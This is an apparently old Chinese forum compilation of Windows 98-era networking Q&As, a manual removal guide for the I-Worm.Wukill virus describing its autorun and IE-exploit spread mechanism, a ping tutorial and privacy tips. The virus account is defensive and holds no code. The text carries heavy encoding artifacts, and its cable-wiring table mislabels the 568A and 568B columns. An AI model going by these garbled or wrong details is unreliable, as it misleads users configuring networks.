答:你所提的實(shí)際上即現(xiàn)在應(yīng)用的比較廣泛的對(duì)等網(wǎng)的連接。很簡(jiǎn)單��,因你已有網(wǎng)卡�,你需做的使是購(gòu)買適合長(zhǎng)度的超五類線和2個(gè)RJ45的水晶頭,再去借一把打線鉗�����。然后再根據(jù)標(biāo)準(zhǔn)做一對(duì)跳線�,即一頭采用T568A標(biāo)準(zhǔn)(具體線的排列是:白綠�����、綠��、白橙���、藍(lán)、白藍(lán)����、橙、白棕�����、棕)�,另一頭采用T568B標(biāo)準(zhǔn)(白橙、橙�����、白綠�����、藍(lán)、白藍(lán)���、綠�����、白棕�、棕)�����。然后在操作系統(tǒng)中添加TCP/IP協(xié)議和Netbuei協(xié)議���,把工作組設(shè)置為workgroup,計(jì)算機(jī)不能相同�����。
15�、問:辦公室機(jī)器桌面的“網(wǎng)上鄰居”圖標(biāo)沒了,能上Internet��,但無法瀏覽其他機(jī)器上的資源了�,怎么辦��?
答:說明你的Internet屬性完好���,但網(wǎng)上鄰居屬性中的“Microsoft 網(wǎng)絡(luò)用戶”這一客戶組件沒了。
進(jìn)到“控制面板”中雙擊“網(wǎng)絡(luò)”����,先在彈出的網(wǎng)絡(luò)對(duì)話框中點(diǎn)按“添加”按鈕,再?gòu)碾S后彈出的“請(qǐng)選擇網(wǎng)絡(luò)組件類型”對(duì)話框中雙擊“客戶”����,最后從隨后的“選擇網(wǎng)絡(luò)客戶機(jī)”對(duì)話框的左側(cè)選擇“Microsoft”后再選擇“Microsoft 網(wǎng)絡(luò)用戶”,“確定”再“確定”并據(jù)提示重啟計(jì)算機(jī)就ok啦�����!先回去解決這個(gè)問題吧你……
16�����、問:辦公室機(jī)器桌面的網(wǎng)上鄰居圖標(biāo)解決了且也能瀏覽其他機(jī)器的共享資源了���,但發(fā)現(xiàn)右鍵中的“共享”命令沒了��!怎么辦?
答:這是因?yàn)檫€缺少個(gè)“Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享”這一網(wǎng)絡(luò)服務(wù)協(xié)議呢��!
先右擊桌面“網(wǎng)上鄰居”選“屬性”�,對(duì)話框中點(diǎn)按“添加”按鈕,再?gòu)碾S后彈出的“請(qǐng)選擇要安裝的網(wǎng)絡(luò)組件”對(duì)話框中雙擊“服務(wù)”���,最后從隨后的“選擇網(wǎng)絡(luò)服務(wù)”對(duì)話框中選擇“Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享”����,“確定”再“確定”并據(jù)提示重啟計(jì)算機(jī)就ok啦���!
17����、問:右鍵中的“共享”命令已經(jīng)顯身�!但我設(shè)了共享不想讓別人從網(wǎng)上鄰居中看到這個(gè)共享目錄,只有自己知道且能實(shí)現(xiàn)異地機(jī)上有完全操作的權(quán)限�����。
答:找到你想要共享的文件夾并右鍵點(diǎn)選“共享…”----這里我就以共享“D:\Windows 98”為例���,先選中“共享為”后在共享名“Windows 98(當(dāng)然也可改名共享哦)”后加一英文狀態(tài)的“$”符,再選中“完全”并輸入設(shè)定好“密碼”�����,然后“確定”一次密碼就OK了。
這樣一來����,絕對(duì)保證別人從網(wǎng)上鄰居中看不到這個(gè)共享目錄的!那~~自己想從異地機(jī)上進(jìn)入并實(shí)現(xiàn)完全操作時(shí)怎么辦呢��?呵呵�����,這么辦:從異地機(jī)的地址欄中鍵入“\\(機(jī)器名)\$(你的共享目錄名)”并“ENTER”�,再輸入密碼并確定后,就進(jìn)入啦�!這樣你可靜悄悄地實(shí)現(xiàn)異地機(jī)上在自己設(shè)定的共享目錄內(nèi)進(jìn)行完全操作啦!不過注意其中“\”不能誤輸入成“/”哦���!……好了���,你會(huì)了嗎?
18���、問:一塊PCI總線的10/100自適應(yīng)網(wǎng)卡�����,無法正常工作�����。主要表現(xiàn)在網(wǎng)絡(luò)時(shí)斷時(shí)續(xù)�,不管是不是Ping自己的IP地址,還是Ping對(duì)方的IP地址����,都有這種情況發(fā)生。查看網(wǎng)卡的指示燈也出現(xiàn)同樣的現(xiàn)象��。
答:首先你可檢查Hub的連接口是不是出了故障���,將該網(wǎng)卡接到其他端口上�,如果問題依然如故�,說明Hub沒有問題。然后你可用網(wǎng)卡隨盤附帶的測(cè)試程序盤查看網(wǎng)卡的有關(guān)參數(shù)�����,其IRQ值為5����,再回到Windows 95/98操作系統(tǒng),查看操作系統(tǒng)分配給網(wǎng)卡的參數(shù)值�����,其IRQ同樣應(yīng)是5�。此外,可檢查安裝該網(wǎng)卡的主板插槽是否有故障�����,你可打開機(jī)箱�����,將網(wǎng)卡換個(gè)PCI插槽試試�����。此外�����,你還可檢查CMOS參數(shù)設(shè)置,重新啟動(dòng)計(jì)算機(jī)�����,進(jìn)入CMOS狀態(tài)����,選擇“PNP/PCI Configuration”一項(xiàng),如果IRQ5后面的狀態(tài)為“Legacy ISA”(保留的ISA總線設(shè)備)��,就應(yīng)當(dāng)將IRQ5后面的狀態(tài)改為“PCI/ISA PNP”����。
19、問:我的電腦與一個(gè)對(duì)等網(wǎng)連接好了����,但不能讀別人電腦上的數(shù)據(jù),這是怎么回事��?
答:可能是你沒有設(shè)置好資源共享:選擇“網(wǎng)絡(luò)→配置→文件及打印共享”����,將兩個(gè)選項(xiàng)全部打勾并確定,安裝成功的標(biāo)志是配置中出現(xiàn)了“Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享”選項(xiàng)����,注意����,還要檢查它與NetBEUI協(xié)議是否進(jìn)行了綁定�。選擇“配置”中的NetBEUI協(xié)議�����,點(diǎn)擊“屬性”按鈕����,看綁定中“Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享”、“Microsoft網(wǎng)絡(luò)用戶”前是否已經(jīng)有對(duì)勾了��。還要在“網(wǎng)絡(luò)→標(biāo)識(shí)”里將“計(jì)算機(jī)名”設(shè)置好���,確定之后系統(tǒng)將重新啟動(dòng)�����。
20�����、問:我的網(wǎng)絡(luò)從集線器升級(jí)為交換機(jī)后��,感覺速度并沒有多大提高����,是什么原因?
答:這種情況需要從以下幾個(gè)方面來分析:
1����、首先應(yīng)確認(rèn)網(wǎng)絡(luò)是否工作在100M狀態(tài),具體做法是:確認(rèn)網(wǎng)線是五類以上線��,網(wǎng)線做法遵循100M標(biāo)準(zhǔn)���,網(wǎng)卡支持100M工作狀態(tài)�,只有滿足以上條件���,交換機(jī)才能工作于100M狀態(tài)��,從而最大限度地體現(xiàn)交換機(jī)的性能優(yōu)勢(shì)��。
2����、如果網(wǎng)絡(luò)在升級(jí)前工作正常,數(shù)據(jù)交換量不是很大��,數(shù)據(jù)沖突和廣播風(fēng)暴現(xiàn)象出現(xiàn)的不是很頻繁����,那么升級(jí)后網(wǎng)絡(luò)性能的提升可能不是很明顯,這是正?���,F(xiàn)象����。
3、還有一種情況是因?yàn)榫W(wǎng)絡(luò)結(jié)構(gòu)設(shè)置不當(dāng)引起的��,例如�,如果把集線器放在第一級(jí)連接服務(wù)器,而把交換機(jī)放在下一級(jí)來連接工作站����,這樣數(shù)據(jù)交換仍然通過集線器進(jìn)行,交換機(jī)的性能優(yōu)勢(shì)沒有體現(xiàn)出來��。所以����,在組網(wǎng)時(shí)應(yīng)當(dāng)充分考慮網(wǎng)絡(luò)結(jié)構(gòu)的合理性����,應(yīng)將性能較好的設(shè)備置于整個(gè)網(wǎng)絡(luò)的最高級(jí)���。
21����、問:VLAN是什么意思���,使用它有什么好處����?
答:VLAN是Virtual Local Area Network的縮寫�����,即虛擬局域網(wǎng)的意思����。VLAN的劃分有三種方式:基于端口(Port)、基于MAC地址和基于IP地址。通過劃分VLAN�,可以把數(shù)據(jù)交換限制在各個(gè)虛擬網(wǎng)的范圍內(nèi),從而減少整個(gè)網(wǎng)絡(luò)范圍內(nèi)廣播包的傳輸���,提高了網(wǎng)絡(luò)的傳輸效率���;同時(shí)各虛擬網(wǎng)之間不能直接進(jìn)行通訊,而必須通過路由器轉(zhuǎn)發(fā)���,起到了隔離端口的作用���,為高級(jí)安全控制提供了可能���,增強(qiáng)了網(wǎng)絡(luò)的安全性�����。VLAN功能的適用性很廣�����,在數(shù)據(jù)交換較頻繁或?qū)W(wǎng)絡(luò)安全性有要求的環(huán)境均可適用���,如:1����、在智能小區(qū)�����、校園����、企業(yè)等應(yīng)用環(huán)境,使用VLAN功能可使不同VLAN間的機(jī)器不能互相訪問��,可為網(wǎng)絡(luò)安全控制提供良好保障����;2、在游戲廳���、大中型企業(yè)等環(huán)境����,使用VLAN可大大減少網(wǎng)絡(luò)中不必要的數(shù)據(jù)交換的數(shù)量����,杜絕廣播風(fēng)暴���,提升網(wǎng)絡(luò)傳輸性能。
22����、問:我的自適應(yīng)網(wǎng)卡只有紅燈閃爍,綠燈不亮���,這種情況正常嗎����?
答:首先你應(yīng)該了解一般自適應(yīng)網(wǎng)卡紅燈和綠燈分別代表什么含義——紅燈代表Link/Act(連通/工作)����,即連通時(shí)紅燈長(zhǎng)亮�,傳輸數(shù)據(jù)時(shí)閃爍;綠燈代表FDX(全雙工)��,即全雙工狀態(tài)時(shí)亮����,半雙工狀態(tài)時(shí)滅。如果一個(gè)半雙工的網(wǎng)絡(luò)設(shè)備(如Hub)和自適應(yīng)網(wǎng)卡相連,由于這張網(wǎng)卡是自適應(yīng)網(wǎng)卡���,它也會(huì)工作在半雙工狀態(tài)���,所以綠燈不亮也屬于正常情況。
23��、問:如何使用交換機(jī)的UpLink端口�,怎樣連接?使用了UpLink口后�����,是否還可以使用其相鄰最近的端口��?
答:UpLink口是交換機(jī)上常見的一種端口�����,它是為了便于兩臺(tái)交換機(jī)之間進(jìn)行級(jí)聯(lián)的端口���。它與其相鄰的普通UTP口使用的是同一通道���,因而���,如果使用了UpLink口,另一個(gè)與之相鄰的普通端口就不能再使用了�����。這兩個(gè)端口稱為共享端口��,不能同時(shí)使用���。級(jí)聯(lián)的時(shí)候��,你可使用一般的網(wǎng)線(網(wǎng)線的兩端都遵循同一標(biāo)準(zhǔn)�,即同是EIA/TIA 568A或568B)將一個(gè)交換機(jī)的普通端口和另一個(gè)交換機(jī)的UpLink口連起來���。如兩個(gè)設(shè)備都使用UpLink口連接���,網(wǎng)線需要一端使用EIA/TIA 568A的標(biāo)準(zhǔn),另一端使用EIA/TIA 568B的標(biāo)準(zhǔn)(如下表)�。
標(biāo)準(zhǔn)568a 標(biāo)準(zhǔn)568b
橙白1 綠白1
橙2 綠2
綠白 3 橙白3
藍(lán)4 藍(lán)4
藍(lán)白5 藍(lán)白5
綠6 橙6
棕白7 棕白7
棕8 棕8
24�、問:我在安裝網(wǎng)卡后,在“系統(tǒng)→設(shè)備管理器”中網(wǎng)卡出現(xiàn)黃色的“��!”號(hào),請(qǐng)問該如何解決���?
答:網(wǎng)卡較容易與其他設(shè)備發(fā)生資源沖突���,尤其是在系統(tǒng)中安裝有多個(gè)插卡的情況下,解決辦法是:
1�����、更換網(wǎng)卡在主板插槽上的位置是最好的解決辦法��。
2�、在該網(wǎng)卡“屬性”窗口“資源”標(biāo)簽中找到“資源類型”列表,選定發(fā)生沖突的“資源”��,按“更改設(shè)置”按鈕���,更改發(fā)生沖突的IRQ中斷號(hào)或者I/O地址��。
3��、有些PCI網(wǎng)卡會(huì)強(qiáng)行占用IRQ10���,與一些強(qiáng)行占用IRQ10的顯示卡發(fā)生IRQ中斷沖突��,如果遇到這種情況�,可在BIOS中將“Assign IRQ For VGA”項(xiàng)設(shè)置為Disabled�,不給顯示卡分配固定的中斷。
4����、運(yùn)行網(wǎng)卡附帶的軟盤中的設(shè)置程序,將網(wǎng)卡設(shè)置為非PNP模式�,設(shè)置IRQ中斷號(hào)和I/O地址為系統(tǒng)未占用的地址;并在BIOS中將相應(yīng)中斷號(hào)由PCI/ISA改為L(zhǎng)egacy ISA��。
如果使用上述方法均不能解決故障�,建議換一塊網(wǎng)卡試試。
25.問:ADSL上網(wǎng)網(wǎng)頁打不開的問題����?
答:是MTU的問題!改一下注冊(cè)表���!
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans\0000\主鍵下面建立字符串鍵名為MaxMTU�,鍵值為1450
查殺I-Worm.Wukill病毒(注意有變種了)的手工方法 (微笑)
我是用手工殺的�����。金山毒霸好象還不行��,跟本就不報(bào)警�����。
首先用進(jìn)程管理工具(如“優(yōu)化大師”帶的進(jìn)程管理工具)把可疑的進(jìn)程殺掉�,再搜索最大不超過87KB的“*.EXE”文件,瑞星上說的自啟動(dòng)“MSTRAY.EXE”文件不對(duì)����,它好象有了新的變種,自啟動(dòng)的文件名可以變換���,而且有時(shí)每次重啟動(dòng)都會(huì)變�����,也不一定在WINDOWS哪個(gè)目錄下���,所以要查整個(gè)不超過87KB大小的.EXE文件,然后將所有圖標(biāo)為文件夾樣式的.EXE文件刪掉�����。同時(shí)對(duì)照注冊(cè)表里的RUN項(xiàng),查找不正常的啟動(dòng)項(xiàng)(建議也用優(yōu)化大師��,這樣好判別����,毒霸的也可以),除刪掉啟動(dòng)項(xiàng)外��,還要再查找一次不正常啟動(dòng)項(xiàng)對(duì)應(yīng)的程序�,并刪掉。注意:這步操作十分危險(xiǎn)���,建議由有經(jīng)驗(yàn)的人員操作���。
接著再分別查找comment.htt 和desktop.ini,把它們都刪掉���。注意不要把“*:\My Documents”下的這兩個(gè)文件刪了���,一般這里的都是正常文件(我自己用的笨辦法就是用記事本打開,看看里面是不是MICROSOFT的東東)�。
最后重啟就OK了。
瑞星的在2月份就可以殺了,毒霸好象到現(xiàn)在都不行�,是它的破壞力太小所以毒霸不屑一顧?��?��?����?���??。�。。���。�。��。�����。?br>
剛又看了看前人的貼���,發(fā)現(xiàn)這個(gè)家伙變種變的還是蠻快的���。其中最大的變化就是自啟動(dòng)項(xiàng)的變化,這個(gè)病毒我遇到的最厲害的是在內(nèi)存中同時(shí)有不同文件名的3個(gè)進(jìn)程���,并且自啟動(dòng)項(xiàng)的名稱也不斷變化�����,但WINFILE.EXE這個(gè)文件始終存在��,而且一般是在根目錄下���,并陪隨comment.htt 和desktop.ini這兩個(gè)文件,可能這可以算為標(biāo)志性文件之一了�����。在其它的目錄下���,則會(huì)根據(jù)你實(shí)際存在的目錄名而更換自己的名稱(呵����,呵,這一點(diǎn)我比較佩服)����,不過無論它怎么換名,文件大小大都是約在85KB左右(具體字節(jié)我沒有記錄)���。
建議懷疑自己中毒時(shí)�,把“隱藏已知文件類型的擴(kuò)展名”這個(gè)選項(xiàng)去掉��,如果有文件夾圖標(biāo)的.EXE文件�����,那么恭喜你---------------中毒了?�。���。。���?!
另:正常的WINFILE.EXE文件大小為151419字節(jié),且圖標(biāo)為一個(gè)文件柜樣式����。
在網(wǎng)上看到了一篇貼子。I-Worm.Wukill
破壞方法:這個(gè)病毒采用文件夾圖標(biāo)���,具有很大迷惑性���。該病毒運(yùn)行后,會(huì)將自己大量復(fù)制到其他目錄中���。
一���、 病毒首次運(yùn)行時(shí)將顯示"This File Has Been Damage!";
二�����、 將自己復(fù)制到windows目錄下并改名為Mstray.exe�;
三、 修改注冊(cè)表:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以達(dá)到其自啟動(dòng)的目的�����;
四、 枚舉磁盤目錄�����,在每個(gè)根目錄下釋放下列文件:
winfile.exe 病毒主體程序
coment.htt 利用IE漏洞調(diào)用同一個(gè)目錄下的"winfile.exe"����,屬性為隱藏。
desktop.ini 系統(tǒng)為隱藏����。采用web方式瀏覽文件夾時(shí),系統(tǒng)會(huì)調(diào)用該文件���,該文件調(diào)用coment.htt ,從而激活病毒����。
五、 病毒修改注冊(cè)表�,隱藏系統(tǒng)文件、隱藏受系統(tǒng)保護(hù)的文件���、隱藏已知的擴(kuò)展名稱���。
這樣����,用戶看不到coment.htt和desktop.ini�����, winfile.exe被隱藏后綴明����,又是文件夾圖標(biāo),用戶極容易認(rèn)為是文件夾而點(diǎn)擊����。
同時(shí)病毒在當(dāng)前路徑下生成的自身拷貝,名稱采用上級(jí)目錄����,或者是當(dāng)前窗口的標(biāo)題,增加隱蔽性�����。
六���、病毒調(diào)用Outlook發(fā)送攜帶病毒的信件��。
你先試試:
1 [在運(yùn)行里輸入REGEDIT (進(jìn)入注冊(cè)表編輯器) 在編輯工具里點(diǎn)吉查找 輸winfile 確定��,即輸出winfile.ini 刪除它 然后回盤里就可以刪除了 ���!]
2 用KV2004升級(jí)版在網(wǎng)上進(jìn)行了最新的升級(jí)后�,運(yùn)行KV2004就可以了
利用Ping命令判定網(wǎng)絡(luò)故障 (sindasun)
Ping 是Windows系列自帶的一個(gè)可執(zhí)行命令��。利用它可以檢查網(wǎng)絡(luò)是否能夠連通�,用好它可以很好地幫助我們分析判定網(wǎng)絡(luò)故障。應(yīng)用格式:Ping IP地址�。該命令還可以加許多參數(shù)使用,具體是鍵入Ping按回車即可看到詳細(xì)說明�。
#11.Ping本機(jī)IP
例如本機(jī)IP地址為:172.168.200.2�。則執(zhí)行命令Ping 172.168.200.2���。如果網(wǎng)卡安裝配置沒有問題�,則應(yīng)有類似下列顯示:
?����。牐燫eplay from 172.168.200.2bytes=32 time<10ms
Ping statistics for 172.168.200.2
?����。牐燩acketsSent=4 Received=4Lost=00% loss
?���。牐燗pproximate round trip times in milli-seconds
Minimum=0msMaxiumu=1msAverage=0ms
?���。牐犎绻贛S-DOS方式下執(zhí)行此命令顯示內(nèi)容為:Request timed out,則表明網(wǎng)卡安裝或配置有問題�。將網(wǎng)線斷開再次執(zhí)行此命令�,如果顯示正常����,則說明本機(jī)使用的IP地址可能與另一臺(tái)正在使用的機(jī)器IP地址重復(fù)了。如果仍然不正常��,則表明本機(jī)網(wǎng)卡安裝或配置有問題��,需繼續(xù)檢查相關(guān)網(wǎng)絡(luò)配置。
#12.Ping網(wǎng)關(guān)IP
?����。牐牸俣ňW(wǎng)關(guān)IP為:172.168.6.1���,則執(zhí)行命令Ping 172.168.6.1。在MS-DOS方式下執(zhí)行此命令��,如果顯示類似以下信息:
?。牐燫eply from 172.168.6.1 bytes=32 time=9ms TTL=255
Ping statistics for 172.168.6.1
?�。牐燩acketsSent=4Received=4Lost=00% loss
Approximate round trip times in milli-seconds
?。牐燤inimum=1msMaximum=9msAverage=5ms
?。牐爠t表明局域網(wǎng)中的網(wǎng)關(guān)路由器正在正常運(yùn)行���。反之,則說明網(wǎng)關(guān)有問題�。
#13.Ping遠(yuǎn)程IP
?����。牐犨@一命令可以檢測(cè)本機(jī)能否正常訪問Internet��。比如本地電信運(yùn)營(yíng)商的IP地址為:202.102.48.141�。在MS-DOS方式下執(zhí)行命令:Ping 202.102.48.141����,如果屏幕顯示:
?��。牐燫eply from 202.102.48.141 bytes=32 time=33ms TTL=252
?����。牐燫eply from 202.102.48.141 bytes=32 time=21ms TTL=252
?���。牐燫eply from 202.102.48.141 bytes=32 time=5ms TTL=252
?。牐燫eply from 202.102.48.141 bytes=32 time=6ms TTL=252
?����。牐燩ing statistics for 202.102.48.141
?。牐燩acketsSent=4Received=4Lost=00% loss
Approximate round trip times in milli-seconds
?�。牐燤inimum=5msMaximum=33msAverage=16ms
則表明運(yùn)行正常����,能夠正常接入互聯(lián)網(wǎng)����。反之���,則表明主機(jī)文件(windows/host)存在問題���。
東西搶注:注意一下:沖擊波之后的DNS服務(wù)器都是禁止PING的也就是關(guān)閉了ICMP協(xié)議的
這樣大家可以使用TRACERT這個(gè)命令跟蹤數(shù)據(jù)包���,也是可以同樣達(dá)到目的
當(dāng)心電腦暴露你的隱私 (sindasun)
如果使用的是辦公室����、網(wǎng)吧等地的公共用機(jī),你的很多秘密就可能暴露在別人眼前���。
#1一�、操作系統(tǒng)
如果想把屬于隱私的圖片����、視頻片斷或者重要文檔文件等保存在公共電腦中,很多人采取的辦法把文件或文件夾的屬性改為“隱藏”��,然后再把它們藏匿在電腦中某個(gè)不起眼的文件夾里�。可在Win 98的“開始”→“文檔”菜單中��,會(huì)記錄最近打開過的15個(gè)文件名,因此別人可以點(diǎn)擊相應(yīng)的文件名來打開文件�,就算你已經(jīng)把文件藏起來了�,別人也可以從這里窺視你的秘密�。
解決辦法:要清除這些痕跡�����,你可以用鼠標(biāo)右鍵點(diǎn)擊任務(wù)欄的“屬性”��,后點(diǎn)“開始菜單程序”�����,再點(diǎn)“清除”就可以刪除“文檔”菜單中的內(nèi)容和其他個(gè)人歷史記錄列表了。這樣做可以在一定程度上保護(hù)你的秘密�����,但別人還可以通過“開始”菜單中的“查找”功能來搜索你的重要文件����,按文件的類別把硬盤上所有的圖形文件��、*.txt�、*.doc文件等找出來����,然后一個(gè)一個(gè)地查看,秘密依然存在被泄露的可能。
報(bào)紙上曾介紹過一種修改注冊(cè)表隱藏硬盤的辦法,即把要隱藏的文件專門放到某個(gè)硬盤(如F盤)上�����,然后修改注冊(cè)表把這個(gè)盤藏起來(在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下新建一個(gè)Dword值“NoDrives”��,再設(shè)置鍵值�,例如把鍵值設(shè)為20就可以隱藏F盤),在資源管理器中就看不到這個(gè)盤了。這種辦法表面上無懈可擊��,被隱藏的盤對(duì)于大多數(shù)軟件都不可見��,你通過“查找”功能也無法找到該盤上的文件,一些所謂的電腦高手也把這種辦法當(dāng)做可靠的保密手段����。然而這種方法有重大的漏洞��,在DOS狀態(tài)下這個(gè)盤完全可見�,而在Windows下�����,我找到一種非常簡(jiǎn)單的辦法破除這種限制。只要在“我的電腦”或者IE瀏覽器的地址欄中鍵入盤符“F:”�,然后打回車鍵���,這個(gè)盤的內(nèi)容就一覽無余���,所有的秘密蕩然無存。
解決辦法:如果對(duì)保密的要求比較高,可以用一些軟件來加密或者隱藏,可以基本解決保密問題。但是�����,就算是用加密/隱藏軟件���,也不是十分安全的���。一方面有些隱藏軟件有漏洞�,對(duì)于熟悉計(jì)算機(jī)的用戶來說���,并不難破解限制�;另一方面一些加密/隱藏軟件的加密程度不高,可找到相應(yīng)的軟件來破解密碼。所以對(duì)于保密要求非常高的用戶來說,如果是比較小的文件,最好不要保存在硬盤上���,可以保存在軟盤上���,如果文件太大��,不能保存在軟盤上����,可以用PGP之類的超強(qiáng)加密軟件來加密��。
#1二���、常用程序
Windows下的很多應(yīng)用程序,如Word���、Excel�����、媒體播放器Media Player、RealPlayer等,會(huì)在該程序“文件”菜單下列出最近打開過的一些文件名�����。盡管你已經(jīng)把文件藏匿在電腦中的某個(gè)地方了,但別人還是可以通過這些文件名清單輕易打開相應(yīng)的文件。
解決辦法:對(duì)于Word 2000、Excel 2000等,可以在Word/Excel的“工具”→“選項(xiàng)”的“常規(guī)”選項(xiàng)卡中把“列出最近所用文件”的個(gè)數(shù)改為0;在媒體播放器和Realplayer中清除這些歷史記錄�,只能到注冊(cè)表中刪除����,要清除Realplayer中的歷史記錄,則到HKEY_LOCAL_MACHINE\Software\CLASSES\Software\RealNetworks\Realplayer\6.0\Preferences\MostRecentClips1刪除相關(guān)鍵值(Realplayer默認(rèn)情況下是在“文件”菜單中顯示最近播放過的8個(gè)剪輯�,Mostrecentclip1只是第一個(gè)��,要?jiǎng)h除其他幾個(gè)你還須要分別刪除)����。要清除媒體播放器上的記錄只有到注冊(cè)表中,刪除HKEY_HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList下的鍵值�。通過注冊(cè)表來清除歷史記錄比較麻煩,而且對(duì)新手來說具有一定危險(xiǎn)性���。
變通的解決辦法是:在看完這些視頻片斷之后��,把文件的擴(kuò)展名改為Realplayer或者媒體播放器等不支持的虛假擴(kuò)展名��。例如你剛才看的視頻文件名字叫做123.mpeg����,你可以把它的文件名改為sdk.dhl���,然后把它重新藏到其他不起眼的文件夾中�����,最好遠(yuǎn)離原來的文件夾��。雖然原先的記錄還保存在“文件”菜單中���,但是Realplayer、媒體播放器已經(jīng)找不到該文件了�����。下次你要再次觀看時(shí)����,可以重新把文件的擴(kuò)展名修改回來�。修改文件擴(kuò)展名對(duì)于隱藏其他類型的文件也是一個(gè)簡(jiǎn)單有效的辦法��,雖然這種辦法并不很保險(xiǎn)��,但對(duì)于很多人而言���,這種辦法已經(jīng)能基本滿足要求了�。相比之下Yahoo�����!Player在這方面就做得好得多�,你可以到Y(jié)ahoo!Player的“Edit→Prefenrence→General”中勾選“On exit��,clear history(退出時(shí)清除歷史記錄)”��,這樣以后你每次關(guān)閉Yahoo���!Player就會(huì)自動(dòng)清除歷史記錄��。
#1三����、IE瀏覽器
如果你是上網(wǎng)用戶,更要小心你的秘密被泄露了�����。IE瀏覽器會(huì)記錄你訪問過的站點(diǎn)的地址��,別人可以通過歷史記錄來查看�。
解決辦法:如果你不想讓別人知道你的行蹤��,可以通過點(diǎn)擊瀏覽器“工具→Internet選項(xiàng)→常規(guī)”選項(xiàng)卡中“清除歷史記錄”����。
對(duì)于那些通過登錄Web收發(fā)電子郵件的用戶來說,你所看過的信別人可以輕易看到�����,這是一個(gè)極其嚴(yán)重卻被廣泛忽視的安全問題�����。那些在網(wǎng)吧上網(wǎng)的人士要特別小心了��,說不定你前腳剛走,那些別具用心的人就來偷看你的秘密了��。通過點(diǎn)擊瀏覽器的“歷史”按鈕���,可以看到最近一段時(shí)間所訪問頁的記錄����。在先選擇“脫機(jī)工作”的情況下����,再點(diǎn)擊有關(guān)E-mail的頁面,別人就可以看到你曾看過的信�����!
解決辦法:要消除這個(gè)漏洞���,僅靠清除歷史記錄是不夠的��,別人即使通過歷史記錄看不到你的訪問記錄了�,但是可以到C:\Windows\Temporary Internet Files文件夾中去查看全部?jī)?nèi)容����。關(guān)鍵就是把這個(gè)文件夾中的內(nèi)容清除�����,你可以點(diǎn)擊瀏覽器“工具”→“Internet選項(xiàng)”之“常規(guī)”選項(xiàng)卡中的“刪除文件”來刪除所有的脫機(jī)內(nèi)容����。
你可能會(huì)發(fā)現(xiàn)���,當(dāng)你用鼠標(biāo)點(diǎn)擊電子郵件的用戶名登錄框時(shí),會(huì)列出曾經(jīng)輸入過的電子郵件地址��;當(dāng)你點(diǎn)擊電子郵件的主題欄時(shí)�����,可能會(huì)列出曾經(jīng)輸入過的郵件標(biāo)題��;當(dāng)你在論壇中的寫帖子時(shí)的標(biāo)題欄中也會(huì)列出曾經(jīng)輸入過的一些標(biāo)題��。所有這些表單中的信息都有可能會(huì)泄露你不想他人知道的信息����。IE瀏覽器具有的“自動(dòng)完成”功能存儲(chǔ)了以前曾鍵入過的條目,因此當(dāng)你下次填寫表單的時(shí)候�����,會(huì)自動(dòng)列出可能相符的項(xiàng)。
解決辦法:要清除記錄����,可點(diǎn)擊IE瀏覽器的“工具”→“Internet選項(xiàng)”→“內(nèi)容”選項(xiàng)卡中的“自動(dòng)完成”,然后點(diǎn)“清除表單”來清除自動(dòng)完成歷史記錄�����。
#1四��、網(wǎng)絡(luò)聊天與郵件
當(dāng)你在聊天室��、論壇中胡說八道的時(shí)候���,別以為沒有人知道你來自何方�,你的IP地址早已經(jīng)被記錄在案��。當(dāng)你用QQ聊天時(shí)�����,別人也有辦法知道你的IP地址���,只要到網(wǎng)上下載安裝一個(gè)查IP地址的小工具�,就可以看到你的IP地址,然后通過“追捕”軟件查出你是哪個(gè)地方的(誤報(bào)可能性大)��,所以別奇怪有人怎么會(huì)知道你的地理方位�����。
解決方案:如要想隱藏自己的IP地址���,最有效的還是通過代理服務(wù)器上網(wǎng)��。
如今網(wǎng)絡(luò)黑客工具(木馬程序)的泛濫����,使得很多并非真正黑客的人也可以遠(yuǎn)程控制你的計(jì)算機(jī)�����,竊取你的信息����。當(dāng)別人用QQ或者E-mail向你發(fā)相片或者歌曲的時(shí)候���,說不定你正在接收一個(gè)木馬程序���。計(jì)算機(jī)如果中了木馬程序后�,就沒有什么秘密可言了��。
解決方案:要防范黑客程序��,除了不要下載來路不明的軟件外��,安裝防火墻和反病毒程序是最有效的措施�。如果你對(duì)網(wǎng)絡(luò)安全性異常敏感,還應(yīng)注意對(duì)Windows系統(tǒng)的安全漏洞打補(bǔ)丁��。
你不但要防范來自網(wǎng)上的危險(xiǎn)�����,你更要防范來自現(xiàn)實(shí)中的竊密者����。在更多的情況下,你周圍的人才是真正最危險(xiǎn)的人?����,F(xiàn)在很多人都用QQ來聊天,也正是QQ成為泄露你秘密的主要渠道���。針對(duì)QQ的竊密工具很多����,可以偷竊密碼��、偷看聊天記錄等�����,簡(jiǎn)直讓人防不勝防����。
解決方案:如果是網(wǎng)吧等公共場(chǎng)所使用QQ,聊天后最好把聊天記錄刪除��。刪除聊天記錄主要有兩種辦法�,如果你對(duì)電腦不太熟悉��,可以點(diǎn)擊QQ的“消息管理”�,在彈出的“消息管理器”窗口中用右鍵點(diǎn)擊你的號(hào)碼(在左上角),然后點(diǎn)“刪除消息”�,就可以刪除全部聊天記錄��,如果你覺得這些聊天記錄對(duì)你很重要想要保存它�����,你可以在“消息管理”中�,用右鍵點(diǎn)擊自己的號(hào)碼��,再點(diǎn)擊“導(dǎo)出聊天記錄為文本文件”��,把它們備份到軟盤上或發(fā)到自己的郵箱保存后再刪除硬盤上的聊天記錄��。有一定電腦使用經(jīng)驗(yàn)的用戶�,可以采取第二種方法:到QQ所在的安裝目錄C:\Program Files\Tencent,刪除以你自己的QQ號(hào)碼命名的文件夾�����,別忘了還要清空回收站哦�!從硬盤上刪除該文件夾比第一種辦法好,因?yàn)槌藙h除聊天記錄外��,還可在“一定程度上”防止他人用破解QQ密碼的工具從這個(gè)文件夾中偷竊你的密碼�,請(qǐng)注意只是“在一定程度上”,因?yàn)檫€可以通過其他途徑來偷竊密碼。
在公共場(chǎng)所上網(wǎng)�,要小心QQ號(hào)碼被盜,可QQ號(hào)碼被盜的現(xiàn)象依然不斷�����。
